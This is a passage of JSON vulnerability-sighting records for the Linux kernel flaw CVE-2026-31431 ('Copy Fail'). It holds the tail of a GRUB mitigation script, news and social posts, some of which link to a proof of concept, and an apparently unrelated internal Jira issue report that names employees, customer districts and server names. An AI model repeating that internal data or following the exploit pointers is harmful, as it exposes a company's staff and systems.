GRUB_VAR=\"GRUB_CMDLINE_LINUX\"\n                elif grep -q \"^GRUB_CMDLINE_LINUX_DEFAULT=\" \"$GRUB_FILE\"; then\n                    GRUB_VAR=\"GRUB_CMDLINE_LINUX_DEFAULT\"\n                else\n                    echo \"[-] Neither GRUB_CMDLINE_LINUX nor GRUB_CMDLINE_LINUX_DEFAULT found in $GRUB_FILE\" >&2\n                    echo \"    Add '$PARAM' to your bootloader's kernel command line manually.\" >&2\n                    exit 1\n                fi\n\n                sed -i \"s|\\(${GRUB_VAR}=\\\"[^\\\"]*\\)\\\"|\\1 ${PARAM}\\\"|\" \"$GRUB_FILE\"\n\n                # Verify the parameter was actually inserted\n                if ! grep -q \"$PARAM\" \"$GRUB_FILE\"; then\n                    echo \"[-] sed substitution failed \u2014 $PARAM not found in $GRUB_FILE after edit.\" >&2\n                    echo \"    Add '$PARAM' to ${GRUB_VAR} in $GRUB_FILE manually.\" >&2\n                    exit 1\n                fi\n                echo \"[+] Added $PARAM to $GRUB_VAR in $GRUB_FILE\"\n\n                if [ -z \"$GRUB_MKCFG\" ]; then\n                    echo \"[-] No GRUB config tool found (grub2-mkconfig / grub-mkconfig).\" >&2\n                    echo \"    Regenerate your GRUB config manually before rebooting.\" >&2\n                    exit 1\n                fi\n\n                GRUB_CFG=$(detect_grub_cfg_path)\n                echo \"[*] Regenerating GRUB config at $GRUB_CFG\"\n                $GRUB_MKCFG -o \"$GRUB_CFG\"\n                echo \"[+] GRUB updated \u2014 reboot required to apply\"\n                echo \"    After reboot, verify with: cat /proc/cmdline | grep initcall_blacklist\"\n            fi\n        fi\n        ;;\n\n    NOT_FOUND)\n        echo \"[-] Kernel config not found.\" >&2\n        echo \"    Try: grep CONFIG_CRYPTO_USER_API_AEAD /boot/config-$KERNEL\" >&2\n        exit 1\n        ;;\n\n    *)\n        echo \"[-] Unexpected config value: $CONFIG_VAL\" >&2\n        exit 1\n        ;;\nesac\n\n# ---------------------------------------------------------------------------\n# Verification\n# ---------------------------------------------------------------------------\necho \"\"\necho \"[+] Done.\"\n\ncase \"$CONFIG_VAL\" in\n    CONFIG_CRYPTO_USER_API_AEAD=m)\n        if lsmod | grep -q \"^algif_aead\"; then\n            echo \"[!] WARNING: algif_aead is still loaded \u2014 unload failed.\"\n        else\n            echo \"[+] algif_aead is NOT loaded. Workaround active immediately.\"\n        fi\n        ;;\n    CONFIG_CRYPTO_USER_API_AEAD=y)\n        echo \"[*] Built-in module \u2014 workaround takes effect after reboot.\"\n        echo \"    Post-reboot check: cat /proc/cmdline | grep initcall_blacklist\"\n        ;;\nesac", "creation_timestamp": "2026-05-05T12:01:42.000000Z"}, {"uuid": "d3d42c43-dcd4-4b15-97b9-ff9fbf82e0fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/nadsec.online/post/3ml46kgtazk2d", "content": "Presenting, for absolutely no reason at all, CVE-2026-31431 as a 587-byte x86_64 static ELF:\ngithub.com/Rat5ak/CVE-2...", "creation_timestamp": "2026-05-05T12:24:28.936091Z"}, {"uuid": "65c9b4b6-ec69-4a55-a6bc-93b601a36bb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/qLtl-ESgxngd0KdCJZLq4iZUn677J7G_lqnf1Nr9VcS_CEGq", "content": "", "creation_timestamp": "2026-05-05T11:26:46.000000Z"}, {"uuid": "5e7f64c5-b9f8-4e62-91c3-37e08ad4cd40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/AdvisoryICS/statuses/116522501138000759", "content": "ICSAP Analysis Report | ICSAP-AN-26-001 - Read full report at : https://drive.google.com/file/d/1v5RWBFT0cHFUDkUhM0enwh3t1PdOGVcv/view\nReading Between the Advisories: Linux Kernel CVE-2026-31431 in the ICS Ecosystem\nCVE-2026-31431 (\"Copy Fail\") was added to CISA's KEV Catalog on May 1. Theori's Xint Code research team disclosed it on April 29. It's a 9-year-old logic flaw in the Linux kernel's algif_aead module that lets any unprivileged local user escalate to root using a 732-byte Python script. The same exploit works on Ubuntu, Amazon Linux, RHEL, and SUSE without modification.\nThe mainstream security community has covered this well. What hasn't been written is the ICS angle.\nWe reviewed both the CISA ICS Advisory dataset (3,800 advisories since 2010) and the ICS[AP] Other CERT and Vendor ICS Advisories dataset (12,468 advisories) to see which industrial control system products have documented Linux exposure to this CVE.\nThree observations:\nOnly 0.8% of CISA ICS advisories have ever explicitly mentioned Linux, the kernel, or embedded Linux components. Across 3,800 advisories, only two disclose a specific kernel version, and both are end-of-life branches.\nSchneider Electric (234 CISA advisories, zero Linux mentions), Rockwell Automation (246, zero), Mitsubishi Electric (119, zero), Hitachi Energy (103, zero), and Moxa (53, zero) have published nothing about Linux in their CISA advisory text, despite shipping Linux-based product lines per their own technical documentation.\nContainer escape applies. CODESYS Control containers, Advantech IoTSuite Edge dockers, Bosch Rexroth ctrlX CORE container apps, and similar containerized industrial edge platforms are subject to the container-breakout behavior identified in Microsoft Defender's published analysis.\nAsset owners cannot rely on advisory text to assess exposure. Direct vendor PSIRT engagement is the only defensible path. As of publication, no major ICS vendor has published a CVE-2026-31431-specific advisory.\nICSAP-AN-26-001 is the inaugural ICSAP Analysis Report. It covers the CVE technical mechanism with primary-source attribution to Theori, a Tier 1A list of 16 ICS product lines with documented Linux exposure, a Tier 2 list of 14 vendors whose Linux products do not surface in advisory text, and practitioner guidance for the next four to six weeks.\nRead the full report at icsadvisoryproject.com.\n#ICS #OTSecurity #CriticalInfrastructure #LinuxKernel #CopyFail #VulnerabilityManagement", "creation_timestamp": "2026-05-05T14:44:29.825760Z"}, {"uuid": "42ca6181-95ab-4113-92a5-39a8313ea1c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/advisoryics.bsky.social/post/3ml4gr4dibs2h", "content": "CVE-2026-31431 ('Copy Fail') added to CISA KEV May 1. Theori's Xint Code disclosed this 9-year-old Linux kernel LPE on 4/29.\n\nWe reviewed 3,800 CISA ICS + 12,468 vendor advisories for ICS Linux exposure.\n\nICSAP-AN-26-001: www.icsadvisoryproject.com/ics-advisory...\n\n#ICS #OTSecurity #CopyFail", "creation_timestamp": "2026-05-05T14:51:24.220529Z"}, {"uuid": "85d60892-6c2c-4af0-95cc-0b9ff0c067d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosecbriefly.bsky.social/post/3ml4hyynggu26", "content": "A critical Linux kernel bug, CVE-2026-31431, allows low-level users to gain full control of systems, prompting urgent patching efforts.\n", "creation_timestamp": "2026-05-05T15:13:42.149946Z"}, {"uuid": "6ad8d71a-57e6-48cd-bb2e-3636bc6e3ed7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/newstecnicas.info.ve/post/3ml4i2aa4ts2b", "content": "\ud83d\udc27 \u00bfC\u00f3mo funciona ' #CopyFail'? El #exploit de 732 bytes que otorga acceso #Root en #Linux (CVE-2026-31431) (+MITIGACI\u00d3N) www.newstecnicas.info.ve/2026/04/copy...", "creation_timestamp": "2026-05-05T15:14:25.351311Z"}, {"uuid": "46a368ea-3d0b-4a92-a859-9237d6410c0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/webradiomexfm.bsky.social/post/3ml4k475i772v", "content": "Vulnerabilidade CopyFail no Linux amea\u00e7a servidores em todo o mundo\n\nExplora\u00e7\u00e3o ativa da falha CVE-2026-31431 coloca em risco distribui\u00e7\u00f5es Linux desde 2017.\n\nhttps://mexnews.online/l/MGv6SH\n\n#mexfm #mexnews #webradiomexfm #brasil #noticias #musica", "creation_timestamp": "2026-05-05T15:51:15.792139Z"}, {"uuid": "696aa910-ef4e-4178-be91-11401391d4cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82925", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a afalg-check\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a itsystem\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-05 14:32:55\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u0423\u0442\u0438\u043b\u0438\u0442\u0430 \u0434\u043b\u044f Linux, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u044c `AF_ALG`/`algif_aead` \u0438 \u043f\u043e\u043c\u043e\u0433\u0430\u0435\u0442 \u043e\u0446\u0435\u043d\u0438\u0442\u044c \u0440\u0438\u0441\u043a \u043f\u043e `CVE-2026-31431`.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-05T15:00:05.000000Z"}, {"uuid": "2193dea0-d8ea-462e-a82d-1a1d0710074f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/geeknewsbot.bsky.social/post/3ml4unv2rn62n", "content": "Podman \ub8e8\ud2b8\ub9ac\uc2a4 \ucee8\ud14c\uc774\ub108\uc640 Copy Fail \uc775\uc2a4\ud50c\ub85c\uc787\n\nCVE-2026-31431 Copy Fail\uc740 \ub85c\uceec \ube44\uad8c\ud55c \uc0ac\uc6a9\uc790\uac00 root \uc178\uc744 \uc5bb\uc744 \uc218 \uc788\uac8c \ud558\uba70, Podman \ub8e8\ud2b8\ub9ac\uc2a4 \ucee8\ud14c\uc774\ub108 \uc548\uc5d0\uc11c\ub3c4 \ucee8\ud14c\uc774\ub108 \ub0b4\ubd80 root \uad8c\ud55c \uc0c1\uc2b9\uc774 \uac00\ub2a5\ud568 Podman \ub8e8\ud2b8\ub9ac\uc2a4 \ucee8\ud14c\uc774\ub108\ub294...", "creation_timestamp": "2026-05-05T19:00:06.233636Z"}, {"uuid": "973bd5de-31e9-4068-bd42-77487f39919b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hendryadrian.bsky.social/post/3ml4jro6tix2d", "content": "Linux kernel flaw CVE-2026-31431 exploited for root access; MOVEit CVE-2026-4670 enables remote breaches; DigiCert revokes 60 certificates after Zhong Stealer exposure; Pentagon advances AI security partnerships. #LinuxSecurity #DataCenter #USA", "creation_timestamp": "2026-05-05T15:45:21.277675Z"}, {"uuid": "9bfcebfb-28cb-41c8-a422-420c19e259f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/picalily.bsky.social/post/3ml4hlv3qls2p", "content": "Does that have the CVE-2026-31431 vulnerability and how easy is the patch?", "creation_timestamp": "2026-05-05T15:06:24.642651Z"}, {"uuid": "e41637fd-a994-40db-96c7-fdf669287f6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/ef-edulog/a5ee4122335571c44ee1ffb6cbb97b4a", "content": "\n\n\n\n\nJira Report \u2014 DO / IM / S2\n\n  :root {\n    --bg: #fff; --bg2: #f5f4ef; --bg3: #ebebeb;\n    --tx: #1a1a1a; --tx2: #666660; --tx3: #999994;\n    --info: #185FA5; --bdr: rgba(0,0,0,0.12); --bdr2: rgba(0,0,0,0.22);\n    --r: 8px; --rl: 12px;\n    --font: -apple-system, BlinkMacSystemFont, 'Segoe UI', sans-serif;\n    --mono: 'SF Mono','Fira Code',monospace;\n  }\n  @media(prefers-color-scheme:dark){\n    :root{--bg:#1e1e1c;--bg2:#2a2a28;--bg3:#333330;--tx:#f0efe8;--tx2:#a8a79f;--tx3:#6e6e68;--info:#85B7EB;--bdr:rgba(255,255,255,0.1);--bdr2:rgba(255,255,255,0.18)}\n  }\n  *{box-sizing:border-box;margin:0;padding:0}\n  body{font-family:var(--font);background:var(--bg);color:var(--tx);padding:24px;max-width:1300px;margin:0 auto}\n  h1{font-size:18px;font-weight:500;margin-bottom:4px}\n  .sub{font-size:12px;color:var(--tx2);margin-bottom:20px}\n  .tabs{display:flex;gap:6px;margin-bottom:1.25rem;flex-wrap:wrap}\n  .tab{padding:5px 13px;border:0.5px solid var(--bdr2);border-radius:var(--r);font-size:13px;cursor:pointer;background:var(--bg);color:var(--tx2)}\n  .tab.active{background:var(--bg2);color:var(--tx);font-weight:500}\n  .tab:hover:not(.active){background:var(--bg2)}\n  .legend{display:flex;gap:14px;flex-wrap:wrap;margin-bottom:1rem;font-size:11px;color:var(--tx2);align-items:center}\n  .li{display:flex;align-items:center;gap:4px}\n  .ld{width:9px;height:9px;border-radius:2px}\n  .summary-grid{display:grid;grid-template-columns:repeat(3,minmax(0,1fr));gap:8px;margin-bottom:1.25rem}\n  .metric{background:var(--bg2);border-radius:var(--r);padding:10px 12px}\n  .ml{font-size:11px;color:var(--tx2);margin-bottom:3px}\n  .mv{font-size:20px;font-weight:500}\n  .project-block{margin-bottom:1.1rem;border:0.5px solid var(--bdr);border-radius:var(--rl);overflow:hidden}\n  .ph{padding:9px 14px;border-bottom:0.5px solid var(--bdr);display:flex;align-items:center;justify-content:space-between}\n  .pn{font-size:13px;font-weight:500}\n  .pm{font-size:11px;color:var(--tx2)}\n  .th{padding:5px 14px;font-size:11px;font-weight:500;color:var(--tx2);background:var(--bg2);display:flex;align-items:center;gap:6px;border-top:0.5px solid var(--bdr)}\n  .tc{background:var(--bg3);color:var(--tx2);padding:1px 6px;border-radius:var(--r);font-size:10px}\n  .cols{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:4px 14px;font-size:10px;color:var(--tx3);background:var(--bg2);border-top:0.5px solid var(--bdr)}\n  .ir{display:grid;grid-template-columns:80px 1fr 86px 82px 82px 80px 98px;gap:4px;padding:6px 14px;align-items:start;border-top:0.5px solid var(--bdr);font-size:11px}\n  .ir.stale{background:rgba(250,238,218,0.3)}\n  .ir.highest{background:rgba(252,235,235,0.35)}\n  .ir.overdue{background:rgba(252,235,235,0.45)}\n  .ir.stale.highest,.ir.stale.overdue{background:rgba(250,220,200,0.45)}\n  @media(prefers-color-scheme:dark){\n    .ir.stale{background:rgba(99,56,6,0.2)}.ir.highest{background:rgba(121,31,31,0.2)}\n    .ir.overdue{background:rgba(121,31,31,0.3)}.ir.stale.highest,.ir.stale.overdue{background:rgba(110,40,6,0.28)}\n  }\n  .ik{color:var(--info);font-size:10px;font-family:var(--mono);white-space:nowrap;text-decoration:none}\n  .ik:hover{text-decoration:underline}\n  .is{color:var(--tx);line-height:1.4;overflow:hidden;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical}\n  .ia{color:var(--tx2);font-size:10px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}\n  .dt{font-size:10px;white-space:nowrap}\n  .upd-ok{color:var(--tx2)}.upd-stale{color:#BA7517;font-weight:500}\n  .due-ok{color:var(--tx2)}.due-over{color:#A32D2D;font-weight:500}\n  .cr{color:var(--tx2)}\n  @media(prefers-color-scheme:dark){.upd-stale{color:#FAC775}.due-over{color:#F7C1C1}}\n  .dot-h{display:inline-block;width:5px;height:5px;border-radius:50%;background:#E24B4A;margin-right:2px;vertical-align:middle}\n  .dot-s{display:inline-block;width:5px;height:5px;border-radius:50%;background:#EF9F27;margin-right:2px;vertical-align:middle}\n  .dot-d{display:inline-block;width:5px;height:5px;border-radius:50%;background:#D85A30;margin-right:2px;vertical-align:middle}\n  .sb{font-size:10px;padding:2px 6px;border-radius:var(--r);text-align:center;white-space:nowrap}\n  .s-ip{background:#FAEEDA;color:#854F0B}.s-td{background:#E1F5EE;color:#0F6E56}\n  .s-oi{background:#FCEBEB;color:#A32D2D}.s-xx{background:var(--bg2);color:var(--tx2)}\n  @media(prefers-color-scheme:dark){\n    .s-ip{background:#633806;color:#FAC775}.s-td{background:#085041;color:#9FE1CB}.s-oi{background:#791F1F;color:#F7C1C1}\n  }\n  .empty{padding:16px;text-align:center;color:var(--tx3);font-size:12px}\n  .footer{font-size:11px;color:var(--tx3);margin-top:24px}\n\n\n\n\nJira Active Issues Report \u2014 DO / IM / S2\n\nGenerated May 05, 2026 at 06:32 PM  \u00b7  Excludes Done, Fixed, Canceled, Deferred  \u00b7  https://karrostech.atlassian.net\n\nLast 24 hrs24\u201348 hrs ago2\u20137 days agoOlder than 7 days\n\n\n  Highest priority\n  Stale \u22655 business days\n  Due date missed\n\n\n\n\n\nDO \u2014 Edulog DevOps\n6\n\nIM \u2014 Incident Management\n2\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                6 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nBug 1\n                    \n\n                      DO-2044\n                      East Allen, IN - RDS Absence codes not saving\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \nTask 5\n                    \n\n                      DO-2046\n                      Alamance, NC - Please turn on User Defined Reports\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2043\n                      SharedServices, ON - Student Import module broken\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2042\n                      Client Cancelation for Kuna Joint School District, ID\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2041\n                      Remove the test server - fr-routing-legacy-test  it is no longer needed.\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2040\n                      Remove queuedNotification lambda function when associated NotificationService changes are deployed\n                      \u2014\n                      May 4, '26\n                      May 4, '26\n                      \u2014\n                      Backlog\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                2 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 2\n                    \n\n                      IM-7571\n                      Cleveland, OH - Client Reported Delays in Both Telematics and with Parent Portal Messages this Morning\n                      \u2014\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7569\n                      Zonar - Delay / Omission of pings to SM, PP\n                      Nick Sundberg\n                      May 5, '26\n                      May 5, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n4\n\nIM \u2014 Incident Management\n0\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                4 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nBug 2\n                    \n\n                      DO-2034\n                      DP V2 (build 180/AV1): EDP gateway /v4.0/vehicles/search returns 0 vehicles for development-test-school tenant\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2033\n                      DP V2 (build 180/AV1): POST /apilive/setting/event/add returns 500 after login (tenantId='', deviceId=0)\n                      \u2014\n                      May 3, '26\n                      May 3, '26\n                      \u2014\n                      Backlog\n                    \nStory 1\n                    \n\n                      DO-2035\n                      Johnston, NC - unable to access Driver Portal web\n                      Brandon Donnelson\n                      May 4, '26\n                      May 5, '26\n                      \u2014\n                      Backlog\n                    \nTask 1\n                    \n\n                      DO-2037\n                      Deploy Hafeez's Data Build Tool\n                      Boluwatife Olaifa\n                      May 4, '26\n                      May 4, '26\n                      May 4, '26\n                      Backlog\n                    \n\n\n\nDO \u2014 Edulog DevOps\n7\n\nIM \u2014 Incident Management\n15\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                7 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 1\n                    \n\n                      DO-2025\n                      Birdville, TX - Please deploy Telematics\n                      Cory Emlen\n                      Apr 29, '26\n                      Apr 30, '26\n                      \u2014\n                      IN PROGRESS\n                    \nTask 6\n                    \n\n                      DO-2032\n                      Need script run on Cobb to remove duplicate locations\n                      Vader\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-2028\n                      All legacy PP ingestions have not run:\n                      Josiah Brown\n                      May 1, '26\n                      May 4, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2027\n                      Patch infra with CopyFail (CVE-2026-31431)\n                      Josiah Brown\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2026\n                      Johnston NC Demo Site down\n                      Vader\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-2024\n                      Review all deployments, evaluate setting limits\n                      Josiah Brown\n                      Apr 29, '26\n                      Apr 29, '26\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-2023\n                      Testing Release Servers\n                      \u2014\n                      Apr 29, '26\n                      Apr 30, '26\n                      \u2014\n                      Backlog\n                    \n            \n\n              \n\n                IM \u2014 Incident Management\n                15 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nStory 15\n                    \n\n                      IM-7567\n                      Fayette County, no bus event update since 4/29\n                      \u2014\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7564\n                      Knox, TN - Gps units not reporting in since yesterday\n                      \u2014\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7563\n                       West Shore - Parent Portal not working\n                      Brandon Donnelson\n                      May 1, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7561\n                      Denton, TX - Parent Portal App is not tracking buses\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7560\n                      Suffolk, call from parent experiencing tracking issues.\n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7559\n                      New Kent, parent portal not tracking\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7557\n                      New Hanover, Parent portal  tracking issues\n                      Brandon Donnelson\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7556\n                      Jefferson, parent portal not tracking \n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7555\n                      Elyria-OH ,Parent Portal App don't track the bus.\n                      Josiah Brown\n                      Apr 30, '26\n                      May 1, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7554\n                      Peoria, AZ - Parent Portal Down\n                      Brandon Donnelson\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7553\n                      Stanfield, AZ's Parent Portal is not working as of this morning.  Last reading 4:16am.  \n                      \u2014\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Blocker\n                    \n                    \n\n                      IM-7551\n                      SM Can't Send Messages to PP/PPL\n                      Boluwatife Olaifa\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7550\n                      Cleveland, OH - Not able to track buses - GPS tracking down\n                      Kehinde Metibemu\n                      Apr 30, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7548\n                      Cobb County, GA - Severely Degraded Athena Performance\n                      Brandon Donnelson\n                      Apr 29, '26\n                      Apr 30, '26\n                      \u2014\n                      Open Issue\n                    \n                    \n\n                      IM-7547\n                      Rochambeau, MD - Busses 203/204 have not had movement in Parent Porta Lite since 7:30 PM on 4/27\n                      Josiah Brown\n                      Apr 29, '26\n                      May 4, '26\n                      \u2014\n                      Open Issue\n                    \n\n\n\nDO \u2014 Edulog DevOps\n50\n\nIM \u2014 Incident Management\n0\n\nS2 \u2014 Soc-2 & Security\n0\n            \n\n              \n\n                DO \u2014 Edulog DevOps\n                50 active issues\n              \n              \n\n                KeySummaryAssignee\n                CreatedLast updatedDue dateStatus\n              \nATH New site request 1\n                    \n\n                      DO-1787\n                      Elyria, OH - Athena Conversion from Legacy\n                      Cory Emlen\n                      Mar 17, '26\n                      Apr 30, '26\n                      Apr 17, '26\n                      Blocked\n                    \nBug 49\n                    \n\n                      DO-2005\n                      Staging-epic-FR3-eks: Bell Time task creation throws ERROR_LOADING_CONTEXT\n                      Vader\n                      Apr 27, '26\n                      Apr 27, '26 (6d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1905\n                      Parent Portal missing route/vehicle data after EKS 1.34 upgrade \u2014 missed cron sync + Hibernate 6 bug\n                      \u2014\n                      Apr 6, '26\n                      Apr 6, '26 (21d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1855\n                      There is no data available in Route assignment, Live substitution modules of Telematcis for Johnston site\n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (28d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1854\n                      There is no data available in multiple pages like Students, Runs, Routes modules of Routing for Johnston site \n                      Mide Dickson\n                      Mar 26, '26\n                      Mar 26, '26 (28d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1842\n                      EDTA service missing MongoDB JVM args \u2014 broken on 57 production tenants\n                      \u2014\n                      Mar 25, '26\n                      Mar 25, '26 (29d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1801\n                      release-2-fr - Elastic search error displays into log - Unable to search for stop locations\n                      \u2014\n                      Mar 19, '26\n                      Mar 19, '26 (33d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1786\n                      [EastAllen, IN 1.78 Smoke]CA Result CSV \u2013 Export fails for valid dates with 400 Bad Request (invalid page number)\n                      Dane Elwood\n                      Mar 17, '26\n                      Mar 26, '26 (28d)\n                      \u2014\n                      Blocked\n                    \n                    \n\n                      DO-1785\n                      [EastAllen, IN 1.78 Smoke]Vehicles \u2013 Seating Configuration popup shows error \u201cnetwork issues\u201d due to backend API failure\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1784\n                      [Lake Superior 1.78 Smoke]Time & Attendance module not opening from main dashboard\n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      Backlog\n                    \n                    \n\n                      DO-1783\n                      Config API is failing for Time & Attendance module in Collinsville site \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1782\n                      Several API calls are failed in ultilities --> Employee Import and Queue Priority modules \n                      Josiah Brown\n                      Mar 17, '26\n                      Mar 17, '26 (35d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1779\n                      [Cleveland -1.78] [Time & attendance][Absence Record] Data preview is not available\n                      Josiah Brown\n                      Mar 16, '26\n                      Mar 16, '26 (36d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1776\n                      Routes API CORS Blocked & Gateway Timeout on Routes Management Page\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 15, '26 (37d)\n                      \u2014\n                      Verification\n                    \n                    \n\n                      DO-1775\n                      [Chicago-1.78] [Telematics --> Edulog standard reports] - Unable to select date range for AM on time report\n                      Josiah Brown\n                      Mar 13, '26\n                      Mar 13, '26 (37d)\n                      \u2014\n                      To Do\n                    \n                    \n\n                      DO-1768\n                      [moorhead 1.78.0] [Telematics] 